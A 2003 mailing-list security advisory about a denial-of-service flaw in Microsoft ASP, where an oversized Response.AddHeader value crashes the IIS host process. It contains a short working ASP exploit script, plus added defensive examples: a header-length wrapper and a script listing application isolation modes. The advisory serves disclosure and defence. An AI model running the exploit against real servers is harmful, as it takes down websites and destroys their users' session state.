List: ntbugtraq
Subject: Microsoft Active Server Pages DoS
From: Parcifal Aertssen <parcifal () AQTRONIX ! COM>
Date: 2003-04-18 22:18:37
AQTRONIX Security Advisory AQ-2003-01
=====================================
Topic: Microsoft Active Server Pages DoS
Release date: 18 April 2003
Systems Tested: Windows 2000 Server Family + SP3 + MS02-062
Affected Systems: IIS 4.0, IIS 5.0, IIS 5.1 with ASP 3.0 installed (I did
not test previous versions of ASP).
I also tested ASP.NET but it doesn't seem vulnerable. So all systems with
the "asp.dll" present are vulnerable.
Mitigating factors: in order to execute the exploit a user would need to be
able to upload or modify an ASP file on the affected server and execute it.
Category: Denial of Service
Vendor URL: http://www.microsoft.com
Author: Parcifal Aertssen
This document (and updates) is available at:
http://www.aqtronix.com/Advisories/AQ-2003-01.txt
Introduction
============
Microsoft's Active Server Pages contains a flaw that lets you crash the ASP
application, which can be used as a denial of service. A malicious user
would need to be able to upload or modify an ASP file and execute it to
exploit this bug.
Details
=======
Microsoft's Active Server Pages is a web technology that lets you easily
create dynamic web pages and complete web-based applications. Pages are
coded in a scripting language such as VBScript. To work with the web-related
parts, ASP adds objects whose methods you can call and whose properties you
can set. One of those methods in the Response object contains a flaw that
can be used to exhaust the stack. The method in question is
Response.AddHeader(). It requires a header name and a header value as its
parameters. If one of those values is a very long string (more than 350000
characters) the ASP application will crash as a result of excessive stack
usage. The dllhost.exe process hosting the ASP application crashes; as a
result the web site using that application, and every other ASP application
in the same pool, goes down with it. The next request for the web site
causes the ASP application to restart (but you lose all application/session
state and variables), or, if you have application caching enabled, the next
request results in the error message "The remote procedure call failed and
did not execute." or "The RPC server is unavailable." Further requests will
eventually restart the application.
Warning: if you run ASP "in-process" then inetinfo.exe will fail, which
means that your complete web server crashes (and restarts if you have IIS 5).
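As an added example (not part of the advisory, and not Microsoft's code): a
length-guarded wrapper around Response.AddHeader that refuses oversized
headers before asp.dll ever processes them, followed by the advisory's own
3500 x 100 character payload sent through the wrapper. SafeAddHeader and
MAX_HEADER_LEN are names chosen here; the limit is an assumption, picked far
below the reported crash threshold, since no legitimate header comes close.

```vbscript
<%
' Added example, not from the advisory: guard Response.AddHeader against
' oversized names/values. The advisory reports the crash above roughly
' 350000 characters; MAX_HEADER_LEN is an assumed, much smaller ceiling.
Option Explicit
Const MAX_HEADER_LEN = 8192

Sub SafeAddHeader(name, value)
    Dim total
    total = Len(name) + Len(value)
    If Len(name) = 0 Then
        Err.Raise vbObjectError + 1, "SafeAddHeader", "empty header name"
    End If
    If total > MAX_HEADER_LEN Then
        Err.Raise vbObjectError + 2, "SafeAddHeader", _
            "header too long: " & total & " characters"
    End If
    ' Only sizes we consider sane reach asp.dll.
    Response.AddHeader name, value
End Sub

' Normal use goes through unchanged.
SafeAddHeader "X-Example", "ok"

' The advisory's payload: 3500 x 100 characters. Through the wrapper it is
' refused before asp.dll sees it, so dllhost.exe / inetinfo.exe stays up.
Dim i, r
r = ""
For i = 1 To 3500
    r = r & String(100, "a")
Next

On Error Resume Next
SafeAddHeader "random-header", r
If Err.Number <> 0 Then
    Response.Write "rejected: " & Err.Description
    Err.Clear
End If
On Error GoTo 0
%>
```

The wrapper only helps for AddHeader calls your own code makes with data it
does not control (query strings, form fields, database values); it does
nothing against someone who can already upload an ASP file, which is the
scenario the advisory's mitigating factors describe.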
Exploit
=======
<%
Dim i, r
r = ""
For i = 1 To 3500
    'each time append 100 characters (350000 in total)
    r = r & String(100, "a")
Next
Response.AddHeader "random-header:", r 'this is where it crashes
%>
Solution
========
None. You can, however, limit the impact of the DoS by running each ASP
application as "Isolated" (Application Protection: High), so that a crash
takes down only that application's own dllhost.exe and not inetinfo.exe or
a dllhost.exe shared with other pooled applications.
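To see which applications on a server would drag others down with them,
here is an added example (not part of the advisory) that walks the IIS
metabase through the ADSI IIS provider and prints each application root
with its isolation mode. It assumes IIS 4/5 with the ADSI provider present,
the AppIsolated property values 0 = in-process, 1 = isolated, 2 = pooled,
and that it is run on the web server itself as an administrator with
cscript; the script and function names are chosen here.

```vbscript
' Added example, not from the advisory: list every IIS application with its
' isolation mode. Assumes the IIS ADSI provider (IIS 4/5) and AppIsolated:
'   0 = in-process (inetinfo.exe), 1 = isolated (own dllhost.exe),
'   2 = pooled (dllhost.exe shared with other pooled apps).
' Run on the server as an administrator:  cscript listapps.vbs
Option Explicit

Dim seen
Set seen = CreateObject("Scripting.Dictionary")

Function Describe(mode)
    Select Case mode
        Case 0: Describe = "IN-PROCESS (crash kills inetinfo.exe)"
        Case 1: Describe = "isolated"
        Case 2: Describe = "POOLED     (crash kills shared dllhost.exe)"
        Case Else: Describe = "unknown(" & mode & ")"
    End Select
End Function

Sub Walk(node)
    Dim child, root
    root = ""
    ' AppRoot is only set on nodes that belong to an application; reading
    ' it elsewhere raises an error, which we treat as "no application".
    On Error Resume Next
    root = node.AppRoot
    On Error GoTo 0
    ' AppRoot is inherited by everything below an application root, so
    ' report each distinct root once.
    If root <> "" Then
        If Not seen.Exists(root) Then
            seen.Add root, True
            WScript.Echo Describe(node.AppIsolated) & vbTab & root
        End If
    End If
    For Each child In node
        If child.Class = "IIsWebVirtualDir" Or child.Class = "IIsWebDirectory" Then
            Walk child
        End If
    Next
End Sub

Dim svc, site
Set svc = GetObject("IIS://localhost/W3SVC")
For Each site In svc
    If site.Class = "IIsWebServer" Then
        Walk GetObject(site.ADsPath & "/Root")
    End If
Next
```

Anything reported as IN-PROCESS is the case the warning above describes;
anything reported as POOLED shares its dllhost.exe with every other pooled
application. To move an application to "Isolated", use the IIS snap-in
(Application Protection: High) or call AppCreate2 with mode 1 on the
application's node.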
Microsoft told me that this patch was going to be included in the next
cumulative patch, which they would release in February. They didn't; they
said that they still had a lot of testing to do together with the other
issues in the cumulative patch. Since February I haven't heard from them.
History
=======
2002.11.04 Found the vulnerability.
2002.11.07 Mailed it to Microsoft.
2003.01.14 Received private patch which worked.
2003.02.10 Received a mail that they still had a lot of testing to do.
2003.04.18 Released initial advisory
Disclaimer
==========
The information in this advisory and any of its demonstrations is provided
"as is" without warranty of any kind.
AQTRONIX is not liable for any direct or indirect damages caused as a result
of using the information or demonstrations provided in any part of this
advisory.